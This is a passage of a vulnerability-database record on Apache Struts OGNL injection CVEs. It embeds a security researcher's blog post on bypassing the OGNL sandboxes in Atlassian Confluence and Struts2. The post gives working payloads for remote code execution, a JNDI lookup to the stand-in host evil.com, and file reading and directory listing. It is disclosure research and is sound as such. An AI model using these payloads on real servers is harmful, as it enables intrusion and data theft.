"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-12-02T21:18:00", "id": "VERACODE:26331", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-26331/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T05:55:55", "description": "Apache Struts is vulnerable to remote code execution. The vulnerability exists due to an incomplete fix of CVE-2020-17530 which is double evaluation if OGNL is used, allowing an attacker to inject maliciously crafted script via the %{...} syntax within the Struts tag.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T04:46:59", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-07-25T21:02:41", "id": "VERACODE:35070", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35070/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-06-06T15:19:42", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T22:51:56", "type": "github", "title": "Remote code execution in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2023-02-01T05:05:23", "id": "GHSA-JC35-Q369-45PV", "href": "https://github.com/advisories/GHSA-jc35-q369-45pv", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T14:36:47", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-02T14:50:51", "type": "github", "title": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-27T05:08:30", "id": "GHSA-WP4H-PVGW-5727", "href": "https://github.com/advisories/GHSA-wp4h-pvgw-5727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:15:19", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:30", "type": "github", "title": "Expression Language Injection in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-01-27T05:03:07", "id": "GHSA-V8J6-6C2R-R27C", "href": "https://github.com/advisories/GHSA-v8j6-6c2r-r27c", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T17:06:16", "description": "## Overview[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#overview>)\n\nObject Graph Notation Language (OGNL) is a popular, Java-based, expression language used in popular frameworks and applications, such as Apache Struts and Atlassian Confluence. In the past, OGNL injections led to some serious remote code execution (RCE) vulnerabilities, such as the [Equifax breach](<https://www.synopsys.com/blogs/software-security/equifax-apache-struts-vulnerability-cve-2017-5638/>), and over the years, protection mechanisms and mitigations against OGNL injections have been developed and improved to limit the impact of these vulnerabilities.\n\nIn this blog post, I will describe how I was able to bypass certain OGNL injection protection mechanisms, including the one used by Struts and the one used by Atlassian Confluence. The purpose of this blog post is to share different approaches used when analyzing this kind of protection so they can be used to harden similar systems.\n\nNo new OGNL injections are being reported as part of this research, and unless future OGNL injections are found on the affected frameworks/applications, or known double evaluations affect an existing Struts application, this research does not constitute any immediate risk for Apache Struts or Atlassian Confluence.\n\n## Hello OGNL, my old friend[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#hello-ognl-my-old-friend>)\n\nI have a past history of bugs found in Struts framework, including [CVE-2016-3087](<https://cwiki.apache.org/confluence/display/WW/S2-033>), [CVE-2016-4436](<https://cwiki.apache.org/confluence/display/WW/S2-035>), [CVE-2017-5638](<https://cwiki.apache.org/confluence/display/WW/S2-046>), [CVE-2018-1327](<https://cwiki.apache.org/confluence/display/WW/S2-056>), [CVE-2020-17530](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and even some [double OGNL injections](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) through both Velocity and FreeMarker tags that remain unfixed to this date. Therefore, I have become familiar with the OGNL sandbox and different escapes over the years and I am still interested in any OGNL-related vulnerabilities that may appear. That was the case with Atlassian Confluence, [CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) and [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>), where the former is an instance of the unresolved double evaluation via Velocity tags mentioned in my [2020 advisory](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nMy friend, Man Yue Mo, wrote a [great article](<https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776/>) describing how the OGNL mitigations have been evolving over the years and there are few other posts that also describe in detail how these mitigations have been improving.\n\nIn 2020, disabling the sandbox became harder, so I decided to change the approach completely. I introduced new ways to get RCE by circumventing the sandbox, and using the application server\u2019s Instance Manager to instantiate arbitrary objects that I could use to achieve RCE. This research was presented at our Black Hat 2020 talk, [Scribbling outside of template security](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>). We reported this issue to the Apache Struts team, and they [fixed](<https://github.com/apache/struts/commit/8d3393f09a06ff4a2b6827b6544524d1d6af3c7c>) the issue by using a block list. However, in 2021, Chris McCown published a [new bypass technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>) which leverages the OGNL\u2019s AST maps and the Apache Commons Collections BeanMap class.\n\nThat was it\u2013at that point I had enough of OGNL and stopped looking into it until two events happened in the same week:\n\n * My friend, [Mert](<https://twitter.com/mertistaken>), found what he thought was an SSTI in a bug bounty program. It turned out to be an OGNL injection, so he asked me to help him with the exploitation of the issue.\n * I read several tweets claiming that [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>) was not vulnerable to RCE on the latest Confluence version (7.18.0 at that time).\n\nOkay, OGNL, my old friend. Here we go again.\n\n## Looking at Confluence `isSafeExpression` protection[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-at-confluence-issafeexpression-protection>)\n\nWhen the CVE-2022-26134 was released there was an initial understanding that the [OGNL injection could not lead to direct RCE in the latest version 7.18.0](<https://twitter.com/httpvoid0x2f/status/1532924239216627712>) since the `isSafeExpression` method was not possible to bypass for that version\n\n\n\nHarsh Jaiswal ([@rootxharsh](<https://twitter.com/rootxharsh>)) and Rahul Maini ([@iamnoooob](<https://twitter.com/iamnoooob>)) took a different approach and looked for a gadget chain in the allowed classes list that could allow them to create an admin account.\n\n\n\nSoon after, [@MCKSysAr](<https://twitter.com/MCKSysAr>) found a [nice and simple bypass](<https://twitter.com/MCKSysAr/status/1533053536430350337>):\n\n 1. Use `Class` property instead of `class` one.\n 2. Use string concatenation to bypass string checks.\n\n \n \n\n\nMCKSysAr\u2019s bypass was soon addressed by blocking the access to the `Class` and `ClassLoader` properties. I had some other ideas, so I decided to take a look at the `isSafeExpression` implementation.\n\nThe first interesting thing I learned was that this method was actually parsing the OGNL expression into its AST form in order to analyze what it does and decide whether it should be allowed to be executed or not. Bye-bye to regexp-based bypasses.\n\nThen the main logic to inspect the parsed tree was the following:\n\n * Starting at the root node of the AST tree, recursively call `containsUnsafeExpression()` on each node of the tree.\n * If the node is an instance of `ASTStaticField`, `ASTCtor` or `ASTAssign` then the expression is deemed to be unsafe. This will prevent payloads using the following vectors: \n * Static field accesses\n * Constructors calls\n * Variable assignments\n * If the node is an `ASTStaticMethod` check that the class the method belongs to is in an allow list containing: \n * `net.sf.hibernate.proxy.HibernateProxy`\n * `java.lang.reflect.Proxy`\n * `net.java.ao.EntityProxyAccessor`\n * `net.java.ao.RawEntity`\n * `net.sf.cglib.proxy.Factory`\n * `java.io.ObjectInputValidation`\n * `net.java.ao.Entity`\n * `com.atlassian.confluence.util.GeneralUtil`\n * `java.io.Serializable`\n * If node is an `ASTProperty` checks block list containing (after the initial fix): \n * `class`\n * `Class`\n * `classLoader`\n * `ClassLoader`\n * If the property looks like a class name, check if the class&#x27;s namespace is defined in the `unsafePackageNames` block list (too long to list here).\n * If node is an `ASTMethod`, check if we are calling `getClass` or `getClassLoader`.\n * If node is an `ASTVarRef`, check if the variable name is in `UNSAFE_VARIABLE_NAMES` block list: \n * `#application`\n * `#parameters`\n * `#request`\n * `#session`\n * `#_memberAccess`\n * `#context`\n * `#attr`\n * If node in an `ASTConst` (eg: a string literal), call `isSafeExpressionInternal` which will check the string against a block list (for example, harmful class names) and, in addition, it will parse the string literal as an OGNL expression and apply the `containsUnsafeExpression()` recursive checks on it.\n * If a node has children, repeat the process for the children.\n\nThis is a pretty comprehensive control since it parses the AST recursively and makes sure that any AST nodes considered harmful are either rejected or inspected further.\n\nMCKSysAr bypass was based on two things: A) `Class` and `ClassLoader` properties were not accounted for when inspecting `ASTProperty` nodes; and B) `\u201djava.lang.\u201d + \u201cRuntime\u201d` was parsed as an `ASTAdd` node with two `ASTConst` children. None of them matched any of the known harmful strings and when parsed as an OGNL expression, none of them were valid expressions so they were not parsed further. A) Was fixed quickly by disallowing access to `Class` and `ClassLoader` properties, but B) was not fixed since it was considered as a security in-depth control (it&#x27;s impossible to analyze all variants in which a malicious string could be written).\n\nWith that in mind I took a look at the[ list of the OGNL AST nodes](<https://github.com/orphan-oss/ognl/tree/master/src/main/java/ognl>) to see if there was anything interesting that was not accounted for in the `isSafeExpression()` method.\n\n### Enter `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-asteval>)\n\nThe first one that got my attention was `ASTEval`. It looked very interesting and it was not accounted for by the `containsUnsafeExpression()` method.\n\n`ASTEval` are nodes in the form of `(expr)(root)` and they will parse the `expr` string into a new AST and evaluate it with `root` as its root node. This will allow us to provide an OGNL expression in the form of a string `(ASTConst)` and evaluate it! We know that `ASTConst` nodes are parsed as OGNL expressions and verified to not be harmful. However, we already saw that if we split the string literal in multiple parts, only the individual parts will be checked and not the result of the concatenation. For example, for the payload below `#application` will never get checked, only `#` and `application` which are deemed to be safe:\n\n \n \n\n\nAs you can see in the resulting tree, there are no hints of any `ASTVarRef` node and therefore access to `#application` is granted.\n\n### Weaponizing `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#weaponizing-asteval>)\n\nThere are multiple ways to craft a payload levering this vector. For example, we could get arbitrary RCE with echoed response:\n \n \n ('(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@get'+'Runtime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))')('')\n \n \n\n\n\n### Enter `ASTMap`, `ASTChain` and `ASTSequence`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-astmap-astchain-and-astsequence>)\n\nI was already familiar with `ASTMap`s from reading [Mc0wn&#x27;s great article](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). In a nutshell, OGNL allows developers to instantiate any `java.util.Map` implementation by using the `@<class_name>@{}` syntax.\n\nUsing this technique, we were able to use a `BeanMap` (a map wrapping a Java bean and exposing its getters and setters as map entries) to bypass the `getClass` limitation by rewriting the payload as:\n \n \n \n BeanMap map = @org.apache.commons.beanutils.BeanMap@{};\n \n map.setBean(\u201c\u201d)\n \n map.get(\u201cclass\u201d).forName(\u201djavax.script.ScriptEngineManager\u201d).newInstance().getEngineByName(\u201cjs\u201d).eval(payload)\n \n \n\nThis payload avoids calling the `BeanMap` constructor explicitly and, therefore, gets rid of the `ASTCtor` limitation. In addition, it allows us to call `Object.getClass()` implicitly by accessing the `class` item. However, we still have another problem: we need to be able to assign the map to a variable (`map`) so we can call the `setBean()` method on it and later call the `get()` method on the same map. Since `ASTAssign` was blocked, assignments were not an option. Fortunately, looking through the list of AST nodes, two more nodes got my attention: `ASTChain` and `ASTSequence`.\n\n * `ASTChain` allows us to pass the result of one evaluation as the root node of the next evaluation. For example: `(one).(two)` will evaluate `one` and use its result as the root for the evaluation of `two`.\n * `ASTSequence` allows us to run several evaluations on the same root object in sequence. For example: `one, two` will evaluate `one` and then `two` using the same root node.\n\nThe idea was to bypass `ASTAssign` constraint by combining `ASTChain` and `ASTSequence` together\n\nWe can set the map returned by the `ASTMap` expression as the root for a sequence of expressions so all of them will have the map as its root object:\n \n \n \n (#@BeanMap@{}).(expression1, expression2)\n \n \n\nIn our case, `expression1` is the call to `setBean()` and `expression2` is the call to `get()`.\n\nTaking that into account and splitting literal strings into multiple parts to bypass the block list we got the following payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@{}).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nThe final AST tree bypassing all `isSafeExpression` checks is:\n\n \n \n\n\nThere was a final problem to solve. The OGNL injection sink was `translateVariable()` which resolves OGNL expressions wrapped in `${expressions}` delimiters. Therefore, our payload was not allowed to contain any curly brackets. Fortunately, for us, [OGNL will replace unicode escapes](<https://github.com/apache/commons-ognl/blob/master/src/main/jjtree/ognl.jjt#L36-L37>) for us so we were able to use the final payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@\\\\u007b\\\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nI submitted these bypasses to Atlassian through its bug bounty program and, even though I was not reporting any new OGNL injections but a bypass of its sandbox, they were kind enough to award me with a $3,600 bounty!\n\n## Looking into Struts2[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-into-struts2>)\n\nAs mentioned before, a friend found what he thought was a Server-Side Template Injection (SSTI) (`%{7*7}` => 49) but it turned out to be an OGNL injection. Since this happened as part of a bug bounty program, I didn\u2019t have access to the source code. I can&#x27;t be sure if the developers were passing untrusted data to an OGNL sink (for example, `[ActionSupport.getText()](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionSupport.html#getText-java.lang.String->)`), or if it was some of the [unfixed double evaluations issues](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) (still working at the time of writing). Anyhow, the application seemed to be using the latest Struts version and known payloads were not working. I decided to take a deeper look.\n\n### New gadgets on the block[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#new-gadgets-on-the-block>)\n\nWhen I listed what objects were available I was surprised to find that many of the usual objects in the Struts OGNL context, such as the value stack, were not there, and some others I haven&#x27;t seen before were available. One of such objects was `#request[\u2018.freemarker.TemplateModel\u2019]`. This object turned out to be an instance of `org.apache.struts2.views.freemarker.ScopesHashModel` containing a variety of new objects. One of them (stored under the `ognl` key) gave me access to an `org.apache.struts2.views.jsp.ui.OgnlTool` instance. Looking at the code for this class I quickly spotted that it was calling `Ognl.getValue()`. This class is not part of Struts, but the OGNL library and, therefore, the Struts sandbox (member access policy) was not enabled! In order to exploit it I used the following payload:\n \n \n \n #request[\u2018.freemarker.TemplateModel\u2019].get(\u2018ognl\u2019).getWrappedObject().findValue(\u2018(new freemarker.template.utility.Execute()).exec({\u201cwhoami\u201d})\u2019, {})\n \n \n\nThat was enough to get the issue accepted as a remote code execution in the bounty program. However, despite having achieved RCE, there were a few unsolved questions:\n\n * Why was this `.freemarker.TemplateModel` object available?\n * Are there any other ways to get RCE on the latest Struts versions?\n\n### Post-invocations Context[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#post-invocations-context>)\n\nAttackers are limited to the objects they are able to access. Normally, OGNL injections take place before the action invocation completes and the action\u2019s `Result` is rendered.\n\nhttps://struts.apache.org/core-developers/attachments/Struts2-Architecture.png\n\nWhen grepping the Struts\u2019s source code for `.freemarker.TemplateModel`, I found out that there are plenty of new objects added to the request scope when preparing the action\u2019s `Result` in order to share them with the view layer (JSP, FreeMarker or Velocity) and `.freemarker.TemplateModel` was [one of them](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerManager.java#L122>). However, those objects are only added after the `ActionInvocation` has been invoked. This implies that if I find `.freemarker.TemplateModel` on the request scope, my injection was evaluated after the action invocation finished building the action\u2019s `Result` object and, therefore, my injection probably did not take place as part of the Struts code but as a [double evaluation in the FreeMarker template](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nThese new objects will offer new ways to get remote code execution, but only if you are lucky to get your injection evaluated after the action\u2019s `Result` has been built. Or not? \n\nIt turned out that the ongoing `ActionInvocation` object can be accessed through the OGNL context and, therefore, we can use it to force the building of the `Result` object in advance. Calling the `Result`s `doExecute()` method will trigger the population of the so-called template model. For example, for Freemarker, `ActionInvocation.createResult()` will create a `FreemarkerResult` instance. Calling its `doExecute()` method will, in turn, call its `[createModel()](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerResult.java#L273>)` method that will populate the template model.\n \n \n \n (#ai=#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'])+\n \n (#ai.setResultCode(\"success\"))+\n \n (#r=#ai.createResult())+\n \n (#r.doExecute(\"pages/test.ftl\",#ai))\n \n \n\nExecuting the above payload will populate the request context with new objects. However, that requires us to know the result code and the template\u2019s path. Fortunately, we can also invoke the `ActionInvocation.invoke()` method that will take care of everything for us!\n \n \n \n #attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke()\n \n \n\nThe line above will result in the template model being populated and stored in the request, and context scopes regardless of where your injection takes place.\n\n### Wild objects appeared[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#wild-objects-appeared>)\n\nAfter the invocation, the request scope and value stack will be populated with additional objects. These objects vary depending on the view layer used. What follows is a list of the most interesting ones (skipping most of them which do not lead to RCE):\n\nFor Freemarker:\n\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.TemplateModel` (`org.apache.struts2.views.freemarker.ScopesHashModel`) \n * `__FreeMarkerServlet.Application__` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`)\n * `.freemarker.RequestParameters` (`freemarker.ext.servlet.HttpRequestParametersHashModel`)\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.Application` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `.freemarker.JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`) \n * `stack` (`com.opensymphony.xwork2.ognl.OgnlValueStack`) \n * `struts` (`org.apache.struts2.util.StrutsUtil`) \n\nFor JSPs:\n\n * `com.opensymphony.xwork2.dispatcher.PageContext` (`PageContextImpl`)\n\nFor Velocity:\n\n * `.KEY_velocity.struts2.context` -> (`StrutsVelocityContext`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`)\n * `struts` (`org.apache.struts2.views.velocity.result.VelocityStrutsUtils`)\n\n### Getting RCE with new objects[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#getting-rce-with-new-objects>)\n\nAnd now let\u2019s have some fun with these new objects! In the following section I will explain how I was able to leverage some of these objects to get remote code execution.\n\n#### ObjectWrapper[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#objectwrapper>)\n\nThere may be different ways to get an instance of a FreeMarker\u2019s `ObjectWrapper`, even if the application is not using FreeMarker as its view layer because Struts uses it internally for rendering JSP tags. A few of them are listed below:\n\n * Through `freemarker.ext.jsp.TaglibFactory.getObjectWrapper()`. Even though Struts\u2019 sandbox forbids access to `freemarker.ext.jsp` package, we can still access it using a BeanMap:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application[\".freemarker.JspTaglibs\"]))+\n \n (#a['objectWrapper'])\n \n \n\n * Through `freemarker.ext.servlet.HttpRequestHashModel.getObjectWrapper()`:\n \n \n \n (#request.get('.freemarker.Request').objectWrapper)\n \n \n\n * Through `freemarker.core.Configurable.getObjectWrapper()`. We need to use the BeanMap trick to access it since `freemarker.core` is also blocklisted:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application['freemarker.Configuration']))+\n \n #a['objectWrapper']\n \n \n\nNow for the fun part, what can we do with an `ObjectWrapper`? There are three interesting methods we can leverage to get RCE:\n\n**`newInstance(class, args)`**\n\nThis method will allow us to instantiate an arbitrary type. Arguments must be wrapped, but the return value is not. For example, we can trigger a JNDI injection lookup:\n \n \n \n objectWrapper.newInstance(@javax.naming.InitialContext@class,null).lookup(\"ldap://evil.com\")\n \n \n\nOr, if Spring libs are available, we can get RCE by supplying a malicious [XML config](<https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml>) for `FileSystemXmlApplicationContext` constructor:\n \n \n \n objectWrapper.newInstance(@org.springframework.context.support.FileSystemXmlApplicationContext@class,{#request.get('.freemarker.Request').objectWrapper.wrap(\"URL\")})\n \n \n\n`**getStaticModels()`**\n\nThis method allows us to get static fields from arbitrary types. The return object is wrapped in a FreeMarker\u2019s `TemplateModel` so we need to unwrap it. An example payload levering [Text4Shell](<https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/>):\n \n \n \n objectWrapper.staticModels.get(\"org.apache.commons.text.lookup.StringLookupFactory\").get(\"INSTANCE\").getWrappedObject().scriptStringLookup().lookup(\"javascript:3+4\")\n \n \n\n`**wrapAsAPI()`**\n\nThis method allows us to wrap any object with a `freemarker.ext.beans.BeanModel` giving us indirect access to its getters and setters methods. Struts\u2019 sandbox will not have visibility on these calls and therefore they can be used to call any blocklisted method.\n\n * `BeanModel.get('field_name')` returns a `TemplateModel` wrapping the object.\n * `BeanModel.get('method_name')` returns either a `SimpleMethodModel` or `OverloadedMethodsModel` wrapping the method.\n\nWe can, therefore, call any blocklisted method with:\n \n \n \n objectWrapper.wrapAsAPI(blocked_object).get(blocked_method)\n \n \n\nThis call will return an instance of `TemplateMethodModelEx`. Its `[exec()](<https://freemarker.apache.org/docs/api/freemarker/template/TemplateMethodModelEx.html#exec-java.util.List->)` method is defined in the `freemarker.template` namespace and, therefore, trying to invoke this method will get blocked by the Struts sandbox. However, `TemplateMethodModelEx` is an interface and what we will really get is an instance of either `freemarker.ext.beans.SimpleMethodModel` or `freemarker.ext.beans.OverloadedMethodsModel`. Since the `exec()` methods on both of them are defined on the `freemarker.ext.beans` namespace, which is not blocklisted, their invocation will succeed. As we saw before, arguments need to be wrapped. As an example we can call the `File.createTempFile(\u201cPREFIX\u201d, \u201cSUFFIX\u201d)` using the following payload:\n \n \n \n objectWrapper.getStaticModels().get(\"java.io.File\").get(\"createTempFile\").exec({objectWrapper.wrap(\"PREFIX\"), objectWrapper.wrap(\"SUFFIX\")})\n \n \n\nWe can achieve the same by calling the `getAPI()` on any `freemarker.template.TemplateModelWithAPISupport` instance. Many of the FreeMarker exposed objects inherit from this interface and will allow us to wrap them with a `BeanModel`. For example, to list all the keys in the Struts Value Stack we can use:\n \n \n \n #request['.freemarker.TemplateModel'].get('stack').getAPI().get(\"context\").getAPI().get(\"keySet\").exec({})\n \n \n\nNote that `com.opensymphony.xwork2.util.OgnlContext.keySet()` would be blocked since it belongs to the `com.opensymphony.xwork2.util` namespace, but in this case, Struts\u2019 sandbox will only see calls to `TemplateHashModel.get()` and `TemplateModelWithAPISupport.getAPI()` which are both allowed.\n\nThe last payload will give us a complete list of all available objects in the Value Stack, many of which could be used for further attacks. Lets see a more interesting example by reading an arbitrary file using `BeanModel`s:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#f=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\web.xml\")}))+ \n \n (#p=#bw.wrapAsAPI(#f).get(\"toPath\").exec({}))+\n \n (#ba=#bw.getStaticModels().get(\"java.nio.file.Files\").get(\"readAllBytes\").exec({#bw.wrap(#p)}))+\n \n \"----\"+\n \n (#b64=#bw.getStaticModels().get(\"java.util.Base64\").get(\"getEncoder\").exec({}).getAPI().get(\"encodeToString\").exec({#bw.wrap(#ba)}))\n \n \n\nOr listing the contents of a directory:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#dir=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\lib\")}))+ \n \n (#l=#bw.wrapAsAPI(#dir).get(\"listFiles\").exec({}).getWrappedObject())+\"---\"+\n \n (#l.{#this})\n 